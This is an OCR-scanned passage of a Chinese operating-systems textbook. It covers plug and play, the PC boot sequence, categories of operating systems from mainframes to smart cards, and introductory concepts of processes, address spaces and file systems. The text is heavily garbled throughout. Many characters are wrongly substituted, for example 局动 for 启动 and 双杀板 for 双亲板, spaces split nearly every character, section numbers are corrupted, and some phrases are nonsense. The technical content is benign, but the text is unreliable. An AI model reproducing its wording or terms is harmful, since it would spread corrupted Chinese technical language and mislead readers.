相 冲 突 ， 结 来 不 能 在 一 起 工作 。 解 决 方案 是 在 每 块 WO 卡 上 提供 DIP 开 
天 或 跳 接 器 ， 并 指导 用 户 对 其 进行 设置 以 选择 中 断 级 别 和 WO 地 址 ， 使 
其 不 会 与 用 户 系 统 的 任何 其 他 部 件 冲 突 。 那 些 热 袁 于 复杂 PC 硬件 的 十 
几 岁 的 青少年 们 有 时 可 以 不 出 差错 地 做 这 类 工作 。 但 是 ， 没 有 人 能 够 
不 出 错 。 


即 插 即 用 所 做 的 工作 是 ， 系 统 目 动 地 收集 有 关 1/O 设 备 的 信息 ， 集 
中 赋予 中 断 级 别 和 IO 地 址 ， 然 后 通知 每 块 卡 所 使 用 的 数值 。 这 项 工作 
与 计算 机 的 局 动 密切 相关 ， 所 以 下 面 我 们 开始 讨论 计算 机 的 局 动 。 不 
过 这 不 是 件 轻松 的 工作 。 


1.3.7 ”局 动 计算 机 


Pentium 的 简要 启动 过 程 如 下 。 在 每 个 Pentium 上 有 一 块 双亲 板 
(在 政治 上 的 纠正 影响 到 计算 机 产业 之 前 ， 它 们 曾 称 为 " 母 板 >) 。 在 
双 杀 板 上 有 一 个 称 为 基本 输入 输出 系统 (Basic Input Output System, 
BIOS) 的 程序 。 在 BIOS 内 有 底层 IO 软件 ， 包 括 读 键 盘 、 写 屏幕 、 进 
行 磁 盘 MVO 以 及 其 他 过 程 。 现 在 这 个 程序 存放 在 一 块 内 速 RAM 中 ， 它 
是 非 可 易 失 性 的 ， 但 是 在 发 现 BIOS 中 有 错时 可 以 通过 操作 系统 对 它 进 
行 更 新 。 


在 计算 机 局 动 时 ，BIOS 开 始 运行 。 它 首先 检查 所 安 洲 的 RAM 数 
量 ， 键 盘 和 其 他 基本 设备 是 否 已 安 逆 并 正常 啊 应 。 接 着 ， 它 开始 扫描 
ISA 和 PCI 辟 线 并 找 出 连 在 上 面 的 所 有 设备 。 其 中 有 些 设备 是 典型 的 遗 
留 设备 〈 即 在 即 插 即 用 发 明之 前 设计 的 ) ， 并 且 有 固定 的 中 断 级 别 和 
IO 地 址 也许 能 用 在 MO 卡 上 的 开关 和 跳 接 夯 设置， 但 是 不 能 被 操作 
系统 修改 ) 。 这 些 设备 被 记录 下 来 。 即 播 即 用 设备 也 被 记录 下 来 。 如 
果 现 有 的 设备 和 系统 上 一 次 局 动 时 的 设备 不 同 ， 则 配置 新 的 设备 。 


然后 ，BIOS 通 过 党 试 存储 在 CMOS 存 储 器 中 的 设备 清单 决定 启动 
设备 。 用 户 可 以 在 系统 刚 启 动 之 后 进入 一 个 BIOS 配 置 程 序 ， 对 设备 清 
单 进行 修改 。— 典 型 地 ， 如 果 存 在 软盘 ， 则 系统 试图 从 软盘 启动 。 如 果 


失败 则 试用 CD-ROM， 看 看 是 否 有 可 局 动 CD-ROM 存 在 。 如 果 软 如 和 
CD-ROM 都 没有 ， 系 统 从 硬盘 启动 。 启 动 设备 上 的 第 一 个 而 区 被 读 入 
内 存 并 执行 。 这 个 扇面 中 包含 一 个 对 保存 在 启动 扇面 末尾 的 分 区 表 检 
查 的 程序 ， 以 确定 哪个 分 区 是 活动 的 。 然 后 ， 从 该 分 区 读 入 第 二 个 启 
动 装载 模块 。 来 自 活 动 分 区 的 这 个 装载 模块 被 读 入 操作 系统 ， 并 局 动 
之 。 


然后 ， 操 作 系 统 询问 BIOS， 以 获得 配置 信息 。 对 于 每 种 设备 ， 系 
统 检查 对 应 的 设备 张 动 程 序 是 否 存 在 。 如 果 没 有 ， 系 统 要求 用 户 插入 
含有 该 设备 驱动 程序 的 CD-ROM 〈 由 设备 供应 商 提供 ) 。 一 旦 有 了 全 
部 的 设备 驱动 程序 ， 操 作 系统 号 将 它们 调 入 内 核 。 然 后 初始 化 有 关 表 
ie, 创建 需要 的 任何 背景 进程 ， 并 在 每 个 终端 上 启动 登录 程序 或 
GUI ° 


14 操作 系统 大 观 园 


操作 系统 已 经 存在 了 半 个 多 世纪 。 在 这 段 时 期 内 ， 出 现 了 各 种 类 
型 的 操作 系统 ， 并 不 是 所 有 这 些 操作 系统 都 很 知名 。 本 节 中 ， 我 们 将 
简要 地 介绍 其 中 的 9 个 。 在 本 书 的 后 面 ， 我 们 还 将 回顾 这 些 系统 。 


1.4.1 大 型 机 操作 系统 


在 操作 系统 的 高 端 是 用 于 大 型 机 的 操作 系统 ， 这 些 房 间 般 大 小 的 
计算 机 仍然 可 以 在 一 些 大 型 公司 的 数据 中 心中 见 到 。 这 些 计 算 机 与 个 
人 计算 机 的 主要 差别 是 其 VO 处 理 能 力 。 一 台 拥 有 1000 个 侯 副 和 上 百 万 
吉凶 市 数据 的 大 型 机 是 很 正常 的 ;， 如 果 有 这 样 的 特性 的 一 台 个 人 计算 
机 会 使 朋友 们 很 痰 茶 。 大 型 机 也 在 高 端的 Web 服 务 硕 、 大 型 电子 商务 
服务 站 点 和 事务 -事务 交易 服务 器 上 有 某 种 程度 的 复活 。 


用 于 大 型 机 的 操作 系统 主要 用 于 面 癌 多 个 作业 的 同时 处 理 ， 多 数 
这 样 的 作业 需要 巨大 的 IO 能 力 。 系 统 主要 提供 三 类 服务 : 批 处 理 、 事 
务 处 理 和 分 时 处 理 。 批 处 理 系统 处 理 不 需要 交互 式 用 户 干 预 的 周期 性 
作业 。 保 险 公 司 的 索赔 处 理 或 连锁 商店 的 销售 报告 通 向 束 是 以 批 处 理 
方式 完成 的 。 事 务 处 理 系 统 人 负责 大 量 小 的 请 求 ， 例 如 ， 银 行 的 支票 处 
理 或 航班 预订 。 每 个 业务 量 痢 很 小 ， 但 是 系统 必须 每 秒 处 理 成 百 上 干 


个 业务 。 分 时 系统 允许 多 个 远程 用 户 同时 在 计算 机 上 运行 作业 ， 诸 如 
在 大 型 数据 库 上 的 查询 。 这 些 功能 是 密切 相关 的 ， 大 型 机 操作 系统 通 
常 完 成 所 有 这 些 功能 。 大 型 机 操作 系统 的 一 个 例子 是 OS/390 (OS/360 
的 后 继 版 本 ) 。 但 是 ， 大 型 机 操作 系统 正在 逐渐 被 诸如 Linux 这 类 


UNIX 的 变 体 所 替代 。 


14.2 ”服务 如 操作 系统 


下 一 个 层次 是 服务 右 操 作 系统 。 它 们 在 服务 右上 和 运行， 服务 器 可 
以 古 大 型 的 个 人 计算 机 、 工 作 站 ， 甚 至 是 大 型 机 。 它 们 通过 网 络 同时 
为 寿 干 个 用 户 服务 ， 并 且 允 许 用 户 共 至 硬件 和 软件 资源 。 服 务 占 可 所 
供 打印 服务 、 文 件 服 务 或 web 服务 。Internet 服 务 商 们 运行 着 许多 台 服 
务 器 机 器 ， 以 支持 他 们 的 用 户 ， 使 Web 站 点 保存 Web 页 面 并 处 理 进来 


的 请 求 。 典 型 的 服务 器 操作 系统 有 Solaris、FreeBSD、Linux 和 和 


Windows Server 200x ° 


14.3 ”多 处 理 需 操作 系统 


一 种 获得 大 量 联合 计算 能 力 的 操作 系统 ， 其 越 来 越 常 用 的 方式 古 
将 多 个 CPU 连 接 成 单个 的 系统 。 依 据 连 接 和 共 至 方式 的 不 同 ， 这 些 系 
统称 为 并 行 计算 机 、 多 计算 机 或 多 处 理 絮 。 它 们 需要 专门 的 操作 系 
统 ， 不 过 通常 采用 的 操作 系统 是 配 有 通信 、 连 接 和 一 致 性 等 专 | 功能 
的 服务 器 操作 系统 的 变 体 。 


个 人 计算 机 中 近来 出 现 了 多 核心 乒 ， 所 以 常规 的 台式 机 和 笔记 本 
电脑 操作 系统 也 开始 与 小 规模 的 多 处 理 絮 打交道 ， 而 核 的 数量 正在 与 
时 俱 进 。 六 运 的 是 ， 由 于 先前 多 年 的 研究 ， 已 经 具备 不 少 天 于 多 人 处 理 
圳 操作 系统 的 知识 ， 将 这 些 知 识 运用 到 多 核 处 理 硕 系统 中 应 该 不 存在 
困难 。 难 点 在 于 要 有 能 够 运用 所 有 这 些 计算 能 力 的 应 用 。 许 多 主流 操 
作 系 统 ， 包 括 Windows 和 Linux， 都 可 以 运行 在 多 核 处 理 器 上 。 


1.4.4 个 人 计算 机 操作 系统 


接着 一 类 是 个 人 计算 机 操作 系统 。 现 代 个 人 计算 机 操作 系统 都 支 
持 多 道 程序 处 理 ， 在 启动 时 ， 通 常 有 十 多 个 程序 开始 运行 。 它 们 的 功 
能 是 为 单个 用 户 提供 良好 的 支持 。 这 类 系统 广泛 用 于 字 处 理 、 电 子 表 
格 、 游 戏 和 Internet 访 问 。 常 见 的 例子 是 Linux、FreeBSD、Windows 
Vista 和 Macintosh 操 作 系 统 。 个 人 计算 机 操作 系统 是 如 此 地 广为人知 ， 
所 以 不 需要 再 做 介绍 了 。 事 实 上 ， 许 多 人 甚至 不 知道 还 有 其 他 的 操作 


1.45 掌上 计算 机 操作 系统 


随 着 系统 越 来 越 小 型 化 ， 我 们 看 到 了 掌上 计算 机 。 掌 上 计算 机 或 
者 个 人 数字 助理 (Personal Digital Assistant, PDA) 是 一 种 可 以 装 进 衬 
衫 口袋 的 小 型 计算 机 ， 它 们 可 以 实现 少量 的 功能 ， 诸 如 电子 地 址 敌 和 
记事 本 之 类 。 而 且 ， 除 了 键盘 和 屏幕 之 外 ， 许 多 移动 电话 与 PDA 几 乎 
没有 差别 。 在 实际 效果 上 ，PDA 和 移动 电话 已 经 在 逐渐 融合 ， 其 差别 
主要 在 于 大 小 、 重 量 以 及 用 户 界面 等 方面 。 这 些 设备 几乎 都 是 基于 带 
有 保护 模式 的 32 位 CPU， 并 且 运 行 最 尖端 的 操作 系统 。 


运行 在 这 些 掌 上 设备 上 的 操作 系统 正在 变 得 越 来 越 复兴， 它们 有 
能 力 处 理 移动 电话 、 数 码 照相 以 及 其 他 功能 。 多 数 设备 还 能 运行 第 三 
方 的 应 用 。 事 实 上 ， 其 中 有 些 设备 开始 采用 十 年 前 的 个 人 操作 系统 。 
掌上 设备 和 PC 机 之 则 的 主要 差别 是， 前 者 没有 才干 GB 的 、 不 断 变化 
的 硬盘 。 在 掌上 设备 上 最 主要 的 两 个 操作 系统 是 Symbian OS 和 Plam 
OS ° 
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意义 上 的 计算 机 ， 并 且 不 允许 用 户 安装 软件 。 典 型 的 例子 有 微波 炉 、 
电视 机 、 汽 车 、DVD 刻 隶 机、 移动 电话 以 及 MP3 播 放 器 一 类 的 设备 。 
区 别 甬 入 式 系统 与 掌上 设备 的 主要 特征 是 ， 不 可 信 的 软件 肯定 不 能 在 
巾 入 式 系统 上 运行 。 用 户 不 能 给 自己 的 微波 炉 下 载 新 的 应 用 程序 一 一 
所 有 的 软件 都 保存 在 ROM 中 。 这 意味 着 在 应 用 程序 之 间 不 存在 保护 ， 
这 样 系统 就 获得 了 某 种 简化 。 在 这 个 领域 中 ， 主 要 的 骸 入 式 操作 系统 


有 QNX 和 VxWorks 等 。 
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温度 和 降水 测量 、 战 场 上 敌 方 运动 的 信息 收集 等 


传 感 右 是 一 种 内 建 有 无 线 电 的 电池 驱动 的 小 型 计算 机 。 它 们 能 源 
有 限 ， 必 须 长 时 间 工作 在 无 人 的 户外 环境 中 ， 通 贡生 恶劣 的 环境 条 件 
下 。 其 网 络 必须 足够 健壮 ， 以 允许 个 别 节 点 失效 。 随 着 电池 开始 耗 
尽 ， 这 种 失效 市 点 会 不 断 增加 。 


感 器 节点 是 一 个 配 有 CPU、RAM、ROM 以 及 一 个 或 多 个 环 
恬 的 实 实在 在 的 计算 机 。 市 点 上 运行 一 个 小 型 但 是 真实 的 操作 
系统 ， 通 常 这 个 操作 系统 是 事件 驱动 的 ， 可 以 响应 外 部 事件 ， 或 者 基 
于 内 部 时 钟 进行 周期 性 的 测量 。 该 操作 系统 必须 小 有 旦 简单 ， 因 为 这 些 
节点 的 RAM 很 小 ， 而 且 电池 寿命 是 一 个 重要 问题 。 另 外 ， 和 骨 入 式 系 
统一 样 ， 所 有 的 程序 是 预先 疼 载 的 ， 用 户 不 会 突然 局 动 从 Internet 上 下 
载 的 程序 ， 这 样 就 使 得 设计 大 为 简化 。TinyOS 是 一 个 用 于 传感器 节点 
的 知名 操作 系统 。 


14.8 ”实时 操作 系统 


另 一 类 操作 系统 是 实时 操作 系统 。 这 些 系统 的 特征 是 将 时 间作 为 
天 键 参数 。 例 如 ， 在 工业 过 程控 制 系统 中 ， 工 厂 中 的 实时 计算 机 必须 
收集 生产 过 程 的 数据 并 用 有 关 数 据 控制 机 絮 。 通 常 ， 系 统 还 必须 满足 
疗 格 的 最 终 时 限 。 例 如 ， 汽 车 在 装配 线 上 移动 时 ， 必 须 在 限定 的 时 间 
内 进行 规定 的 操作 。 如 果 焊 接 机 器 人 焊接 得 太 早 或 太 迟 ， 部 会 虹 坏 汽 
车 。 如 果 某 个 动作 必须 绝对 地 在 规定 的 时 刻 〈 或 规定 的 时 间 范 围 ) 发 
生 ， 这 就 是 硬 实时 系统 。 可 以 在 工业 过 程控 制 、 民 用 航空 、 军 事 以 及 
类 似 应 用 中 看 到 很 多 这 样 的 系统 。 这 些 系 统 必须 提供 绝对 保证 ， 让 某 
个 特定 的 动作 在 给 定 的 时 间 内 完成 。 


另 一 类 实时 系统 是 软 实时 系统 ， 在 这 种 系统 中 ， 偶 尔 违反 最 终 时 
限 是 不 希望 的 ， 但 可 以 接受 ， 并 且 不 会 引起 任何 永久 性 的 损害 。 数 字 
音频 或 多 媒体 系统 就 是 这 类 系统 。 数 字 电 话 也 是 软 实时 系统 。 


由 于 在 〈 硬 ) 实时 系统 中 满足 严格 的 时 限 是 关键 ， 所 以 操作 系统 
吕 是 一 个 简单 的 与 应 用 程序 链接 的 库 ， 各 个 部 分 必须 紧密 耦合 并 且 彼 
此 之 间 没 有 保护 。 这 种 类 型 的 实时 系统 的 例子 有 e-Cos。 


和 掌上、 藤 入 式 以 及 实时 系统 的 分 类 之 间 有 不 少 是 彼此 重 有 的 。 几 
乎 所 有 这 些 系统 至 少 存在 某 种 软 实时 情景 。 艇 入 式 和 实时 系统 只 运行 
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更 多 用 于 工业 领域 。 无 论坛 样 ， 这 些 系统 确实 存在 一 些 共 同 点 。 


14.9 窜 能 卡 操作 系统 


最 小 的 操作 系统 运行 在 智能 卡 上 。 智能 卡 是 一 种 包 售 有 一 块 CPU 
心 片 的 信用 卡 。 它 有 非 营 严格 的 运行 能 耗 和 存储 空间 的 限制 。 其 中 ， 
有 些 智 能 卡 只 具有 单项 功能 ， 诸 如 电子 文 付 ， 但 是 其 他 的 智能 卡 则 可 
在 同一 块 卡 中 拥有 多 项 功能 。 它 们 是 专用 的 操作 系统 。 


有 些 智 能 卡 是 面向 Java 的 。 其 舍 义 是 在 智能 卡 的 ROM 中 有 一 个 
Java 虚 拟 机 (Java Virtual Machine, JVM) 解释 器 。Java 小 程序 被 下 载 
到 卡 中 并 由 JVM 解 释 器 解释 。 有 些 卡 可 以 同时 处 理 多 个 Java 小 程序 ， 
这 就 是 多 道 程序 ， 并 且 需 要 对 它们 进行 调度 。 在 两 个 或 多 个 小 程序 同 
时 运行 时 ， 资 源 管 理 和 保护 就 成 为 突出 的 问题 。 这 些 问 题 必 须 由 卡 上 
的 操作 系统 (通常 是 非常 原始 的 ， 人 处 理 。 


1.5 操作 系统 概念 


多 数 操作 系统 都 使 用 某 些 基 本 概念 和 抽象 ， 诸 如 进程 、 地 址 空间 
以 及 文件 等 ， 它 们 是 需要 理解 的 中 心 。 作 为 引 论 ， 在 下 面 的 儿 市 中 ， 
我 们 将 较为 简要 地 分 析 这 些 基本 概念 中 的 一 些 成 分 。 在 本 书 的 后 面 ， 
我 们 将 详细 地 讨论 它们 。 为 了 说 明 这 些 概念 ， 我 们 有 时 将 使 用 示例 ， 
这 些 示例 通常 源 自 UNIX。 不 过 ， 类 似 的 例子 在 其 他 的 操作 系统 中 也 明 
显 地 存在 ， 进 而 ， 我 们 将 在 第 11 章 中 具体 讨论 Windows Vista ° 


151 进程 


在 所 有 操作 系统 中 ， 一 个 重要 的 概念 是 进程 (process) 。 进 程 本 
质 上 是 正在 执行 的 一 个 程序 。 与 每 个 进程 相关 的 是 进程 的 地 址 空间 
(address space) ， 这 是 从 某 个 最 小 值 的 存储 位 置 (通常 是 零 ) 到 某 个 
最 大 值 存 储 位 置 的 列表 。 在 这 个 地 址 空间 中 ， 进 程 可 以 进行 读 写 。 该 
地 址 空间 中 存放 有 可 执行 程序 、 程 序 的 数据 以 及 程序 的 堆栈 。 与 每 个 
进程 相关 的 还 有 资源 集 ， 通 常 包括 寄存 器 (含有 程序 计数 器 和 堆栈 指 
针 ) 、 打 开 文件 的 清单 、 突 出 的 报警 、 有 关 进 程 清单 ， 以 及 运行 该 程 
序 所 需要 的 所 有 其 他 信息 。 进 程 基本 上 是 容纳 运行 一 个 程序 所 需要 所 
有 信息 的 容器 。 


进程 的 概念 将 在 第 2 草 详 细 讨论 ， 不 过 ， 对 进程 建立 一 种 直观 感觉 
的 最 便利 方式 是 分 析 一 个 分 时 系统 。 用 户 会 局 动 一 个 视频 编辑 程序 ， 
并 指令 它 按照 某 个 格式 转换 一 小 时 的 视频 《有 时 会 花费 数 小 时 ) ， 然 
后 离开 去 Web 上 冲浪 。 同 时 ， 一 个 被 周期 性 唤醒 ,用 来 检查 进来 的 e- 
mail 的 后 台 进 程 会 开始 运行 。 这 样 ， 我 们 就 有 了 (人 至少) 三 个 活动 进 
Ke: 视频 编辑 器 、Web 浏 览 器 以 及 e-mail 接 收回。 操作 系统 周期 性 地 挂 
起 一 个 进程 然后 启动 运行 男 一 个 进程 。 例 如 ， 在 过 去 的 一 秒 钟 内 ， 第 
一 个 进程 已 使 用 完 分 配给 它 的 时 间 片 。 


一 个 进程 暂时 被 这 样 挂 起 后 ， 在 随后 的 某 个 时 刻 里 ， 该 进程 再 次 
局 动 时 的 状态 必须 与 先前 暂停 时 完全 相同 ， 这 殉 意 味 着 在 挂 起 时 该 进 
程 的 所 有 信息 都 要 保存 下 来 。 例 如 ， 为 了 同时 读 入 信息 ， 进 程 打开 了 
大 二 文件 。 同 每 个 被 打开 文件 有 关 的 是 指向 当前 位 置 的 指针 ( 即 下 一 
个 将 读 出 的 字 节 或 记录 ) 。 在 一 个 进程 暂时 被 挂 起 时 ， 所 有 这 些 指针 
都 必须 保存 起 来 ， 这 样 在 该 进程 重新 局 动 之 后 ， 所 执行 的 读 调 用 才能 
读 到 正确 的 数据 。 在 许多 操作 系统 中 ， 与 一 个 进程 有 关 的 所 有 信息 ， 
除了 该 进程 目 身 地 址 空间 的 内 容 以 外 ， 均 存放 在 操作 系统 的 一 张 表 
中 ， 称 为 进程 表 (process table) ， 进 程 表 是 数组 (或 链表 ) 结构 ， 当 
前 存在 的 每 个 进程 都 要 占用 其 中 一 项 。 


所 以 ,一 个 ( 挂 起 的 ) 进程 包括 : 进程 的 地 址 空间 ， 往 往 称 作 磁 
心 映像 (core image， 纪 念 过 去 年 代 中 使 用 的 磁 忌 存储器) ， 以 及 对 应 
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与 进程 管理 有 关 的 最 关键 的 系统 调用 是 那些 进行 进程 创建 和 进程 
终止 的 系统 调用 。 考 虑 一 个 典型 的 例子 。 有 一 个 称 为 命令 解释 器 
(command interpreter) 或 shell 的 进程 从 终端 上 读 命令 。 此 时 ， 用 户 刚 
键入 一 条 命令 要 求 编译 一 个 程序 。shell 必 须 先 创建 一 个 新 进程 来 执行 
编译 程序 。 当 执行 编译 的 进程 结束 时 ， 它 执行 一 条 系统 调用 来 终止 自 
a 
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进程 又 可 以 创建 子 进程 ， 则 很 容易 得 到 进程 树 ， 如 网 1-13 所 示 。 合 作 
完成 某 些 作 业 的 相关 进程 经 向 需要 彼此 通信 和 以便 同步 它们 的 行为 。 这 
种 通信 称 为 进程 间 通 信 (interprocess communication) ， 将 在 第 2 章 中 


详细 讨论 。 


图 1-13 一 个 进程 桂 。 进 程 A 创 建 两 个 子 进程 B 和 C， 进 程 B 创 建 三 
个 子 进程 D、E 和 F 


其 他 可 用 的 进程 系统 调用 包括 : 申请 更 多 的 内 存 (或 释放 不 再 需 
要 的 内 存 ) 、 等 待 一 个 子 进程 结束 、 用 另 一 个 程序 覆盖 该 程序 等 。 


有 时， 需要 问 一 个 正在 运行 的 进程 传送 信息 ， 而 该 进程 并 没有 等 
竺 接收 信息 。 例 如 ， 一 个 进程 通过 网 络 同 男 一 台 机 器 上 的 进程 发 送 消 
忌 进 行 通信 。 为 了 你 证 一 条 消 居 或 消 筷 的 应 管 不 会 丢失 ， 发 送 者 要 求 
它 所 在 的 操作 系统 在 指定 的 才干 秒 后 给 一 个 通知 ， 这 样 如 采 对 方 尚 未 
收 到 确认 消息 就 可 以 进行 重 发 。 在 设 定 该 定时 器 后 ， 程 序 可 以 继续 做 
其 他 工作 。 


在 限定 的 秒 数 流逝 之 后 ， 操 作 系 统 回 该 进程 发 送 一 个 警告 信和 号 
(alarm signal) 。 此 信号 引起 该 进程 暂时 挂 起 ， 无 论 该 进程 正在 做 什 
么 ， 系 统 将 其 寄存 右 的 值 保存 到 堆栈 ， 并 开始 运行 一 个 特别 的 信号 处 
理 过 程 ， 比 如 重 者 发 送 可 能 丢失 的 消 轧 。 这 些 信号 征 软 件 模拟 的 硬件 
中 断 ， 除 了 定时 融 到 期 之 外 ， 该 信号 可 以 由 各 种 原因 产生 。 许 多 由 人 硬 
件 检测 出 来 的 陷阱 ， 诸 如 执行 了 非法 指令 或 使 用 了 无 效 地 址 等 ， 也 被 
转换 成 该 信号 并 交 给 这 个 进程 。 


系统 管理 器 授权 每 个 进程 使 用 一 个 给 定 的 UID 标 识 (User 
[Dentification) 。 每 个 被 启动 的 进程 都 有 一 个 启动 该 进程 的 用 户 UID 。 


子 进 程 拥有 与 父 进程 一 样 的 UID。 用 户 可 以 是 某 个 组 的 成 员 ， 每 个 组 


也 有 一 个 GID 标 识 (Group IDentification) 。 


在 UNIX 中 ， 有 一 个 UID 称 为 超级 用 户 (superuser) ， 具 有 特殊 的 
权利 ， 可 以 违背 一 些 保护 规则 。 在 大 型 系统 中 ， 只 有 系统 管理 员 掌握 
着 成 为 超级 用 户 的 密码 ， 但 是 许多 普通 用 户 (特别 是 学 生 ) 们 做 出 可 
观 的 努力 试图 找 出 系统 的 缺陷， 从 而 使 他 们 不 用 密码 就 可 以 成 为 超级 
HJ s 


在 第 2 章 中 ， 我 们 将 讨论 进程 、 进 程 间 通 信 以 及 有 关 的 内 容 。 


1.5.2 ”地 址 空间 


每 台 计 算 机 都 有 一 些 主 存 ， 用 来 保存 正在 执行 的 程序 。 在 非常 简 
单 的 操作 系统 中 ， 内 存 中 一 次 只 能 有 一 个 程序 。 如 采 要 运行 第 二 个 程 
序 ， 第 一 个 程序 就 必须 被 移出 内 存 ， 再 把 第 二 个 程序 又 入 内 存 。 


较 复杂 的 操作 系统 允许 在 内 存 中 同时 运行 多 道 程序 。 为 了 避免 它 
们 彼此 互相 干扰 (包括 操作 系统 ) ， 需 要 有 某 种 保护 机 制 。 虽 然 这 种 
机 制 必然 是 硬件 形式 的 ， 但 是 它 由 操作 系统 掌控 。 


上 述 的 观点 涉及 对 计算 机 主 存 的 管理 和 保护 。 另 一 种 不 同 的 但 是 
同样 重要 并 与 存储 侨 有 关 的 内 容 ， 是 管理 进程 的 地 址 空间 。 通 第 ， 每 
个 进程 有 一 些 可 以 使 用 的 地 址 集合 ， 典 型 值 从 0 开始 直到 某 个 最 大 值 。 
在 最 简单 的 情形 下 ， 一 个 进程 可 拥有 的 最 大 地 址 空间 小 于 主 存 。 在 这 
种 方式 下 ， 进 程 可 以 用 满 其 地 址 空间 ， 而 且 内 存 中 也 有 足够 的 空间 容 
纳 该 进程 。 


但 是 ， 在 许多 32 位 或 64 位 地 址 的 计算 机 中 ， 分 别 有 232 或 264 字 贡 
的 地 址 空间 。 如 果 一 个 进程 有 比 计算 机 拥有 的 主 存 还 大 的 地 址 空间 ， 
而 且 该 进程 希望 使 用 全 部 的 内 存 ， 那 怎么 办 呢 ? 在 早期 的 计算 机 中 ， 
这 个 进程 只 好 承认 坏 运 气 了 。 现 在 ， 有 了 一 种 称 为 虚拟 内 存 的 技术 ， 
正如 前 面 已 经 介绍 过 的 ， 操 作 系 统 可 以 把 部 分 地 址 空间 装 入 主 存 ， 部 


分 留 在 磁盘 上 ， 并 且 在 需要 时 军权 交换 它们 。 在 本 质 上 ， 操 作 系统 创 
建 了 一 个 地 址 空间 的 抽象 ， 作 为 进程 可 以 引用 地 址 的 集合 。 该 地 址 空 
间 与 机 需 的 物理 内 存 解 耕 ， 可 能 大 于 也 可 能 小 于 该 物理 空间 。 对 地 址 
空间 和 物理 空间 的 管理 组 成 了 操作 系统 功能 的 一 个 重要 部 分 ， 本 书 中 
整个 第 3 章 都 与 这 个 主题 有 关 。 


1.5.3 ”文件 


实际 上 ， 文 持 操 作 系统 的 另 一 个 关键 概念 是 文件 系统 。 如 前 所 
述 ， 操 作 系统 的 一 项 主要 功能 是 隐藏 磁盘 和 其 他 IO 设备 的 细 世 特性 ， 
并 提供 给 程序 员 一 个 民 好 、 清 晰 的 独立 于 设备 的 抽象 文件 模型 。 显 
然 ， 创 建文 件 、 删 除 文 件 、 读 文件 和 写 文件 等 都 需要 系统 调用 。 在 文 
件 可 以 读 取 之 前 ， 必 须 先 在 磁盘 上 定位 和 打开 文件 ， 在 文件 读 过 之 后 
应 该 关闭 该 文件 ， 有 关 的 系统 调用 则 用 于 完成 这 类 操作 。 


为 了 提供 保存 文件 的 地 方 ， 大 多 数 操作 系统 支持 目录 (directory) 
的 概念 ， 从 而 可 把 文件 分 类 成 组 。 比 如 ， 学 生 可 给 所 选 的 每 个 课程 创 
建 一 个 目录 〈 用 于 保存 该 课程 所 需 的 程序 ) ， 男 设 一 个 目录 存放 电子 
邮件 ， 再 有 一 个 目录 用 于 保存 万 维 网 主页 。 这 下 需要 系统 调用 创建 和 
删除 目录 、 将 已 有 的 文件 放 入 目 邓 中、 从 目录 中 删除 文件 等 。 目 隶 项 
可 以 是 文件 或 着 目录 ， 这 样 束 产生 了 层次 结构 一 一 文件 系统 ， 如 图 1-14 
所 示 。 
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图 1-14 大 学 院 系 的 文件 系统 


进程 和 文件 层次 都 可 以 组 织 成 树 状 结构 ， 但 这 两 种 树 状 结构 有 不 
少 不 同 之 处 。 一 般 进 程 的 树 状 结构 层次 不 深 (很 少 超 过 三 层 ) ， 而 文 
件 树 状 结构 的 层次 单 般 多 达 四 层 、 五 层 或 更 多 层 。 进 程 树 层 次 结构 是 
暂时 的 ， 通 党 最 多 存在 几 分 钟 ， 而 目录 层次 则 可 能 存在 数 年 之 久 。 进 
程 和 文件 在 所 有 权 及 保护 方面 也 古 有 区 别 的 。 典 型 地 ， 只 有 父 进 程 能 
控制 和 访问 子 进程 ， 而 在 文件 和 目 如 中 通常 存在 一 种 机 制 ， 使 文件 所 
有 者 之 外 的 其 他 用 户 也 可 以 访问 该 文件 。 


目录 层 结构 中 的 每 一 个 文件 都 可 以 通过 从 目录 的 顶部 ， 即 根 目录 
(root directory) 开始 的 路 径 名 (path name) 来 确定 。 绝 对 路 径 名 包含 


了 从 根 目 录 到 该 文件 的 所 有 目录 清单 ， 它 们 之 间 用 正和 斜 线 隔 开 。 如 在 
图 1-14 中 ， 文 件 CS101 路 径 名 是 /Faculty/Prof.Brown/Courses/CS101。 最 
开始 的 正 斜 线 表示 这 是 从 根 目 录 开 始 的 绝对 路 径 。 顺 便 提 及 ， 在 MS- 
DOS 和 Windows 中 ， 用 反 斜 线 (\) 字符 作为 分 隔 符 ， 替 代 了 正 斜 线 
O ， 这 样 ， 上 面 给 出 的 文件 路 径 会 写 为 
\Faculty\Prof.Brown\Courses\CS101。 在 本 书 中 ， 我 们 一 般 使 用 路 径 的 


UNIX 惯 例 。 


在 实例 中 ， 每 个 进程 有 一 个 工作 目录 (working directory) , # 
中 ， 路 径 名 不 以 斜 线 开 始 。 如 在 图 1-14 中 的 例子 ， 如 
果 /Faculty/Prof.Brown 是 工作 目录 ， 那 么 Courses/CS101 与 上 面 给 定 的 绝 
对 路 径 名 表示 的 是 同一 个 文件 。 进 程 可 以 通过 使 用 系统 调用 指定 新 的 
工作 目录 ， 从 而 变更 其 工作 目录 。 


在 读 写 文件 之 前 ， 首 先 要 打开 文件 ， 检 查 其 访问 权限 。 者 权限 许 
可 ， 系 统 将 返回 一 个 小 整数 ， 称 作文 件 描述 符 (file descriptor) ， 供 后 
续 操作 使 用 。 若 禁止 访问 ， 系 统 则 返回 一 个 错误 码 。 


在 UNIX 中 的 另 一 个 重要 概念 是 安装 文件 系统 。 几 乎 所 有 的 个 人 计 
算 机 都 有 一 个 或 多 个 光盘 驱动 右 ， 可 以 插入 CD-ROM 和 DVD ° Eff VL 
平 都 有 USB 接 口 ， 可 以 插入 USB 存 储 棱 〈 实 际 是 固态 磁 强 驱动 器 ) 。 
为 了 提供 一 个 出 色 的 方式 处 理 可 移动 介质 ，UNIX 人 允许 把 在 CD-ROM 或 
DVD 上 的 文件 系统 接 入 到 主 文件 树 上 。 考 虑 图 1-15a 的 情形 。 在 mount 


调用 之 前 ， 根 文件 系统 在 硬盘 上 ， 而 第 二 个 文件 系统 在 CD-ROM 上 ， 
它们 是 分 离 的 和 无 关 的 。 
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图 1-15 a) 在 安装 前 ， 驱 动 器 0 上 的 文件 不 可 访问 ; b) 在 安装 后 ， 它 
们 成 了 文件 层次 的 一 部 分 


然而 ， 不 能 使 用 在 CD-ROM 上 的 文件 系统 ， 因 为 上 面 没 有 可 指定 
的 路 径 。UNIX 不 允许 在 路 径 前 面 加 上 驱动 器 名 称 或 代码 ， 那 样 做 就 完 
全 成 了 设备 相关 类 型 了 ， 这 是 操作 系统 应 该 消除 的 。 代 车 的 方法 是 ， 
mount 系 统 调 用 允许 把 在 CD-ROM 上 的 文件 系统 连接 到 程序 所 希望 的 根 
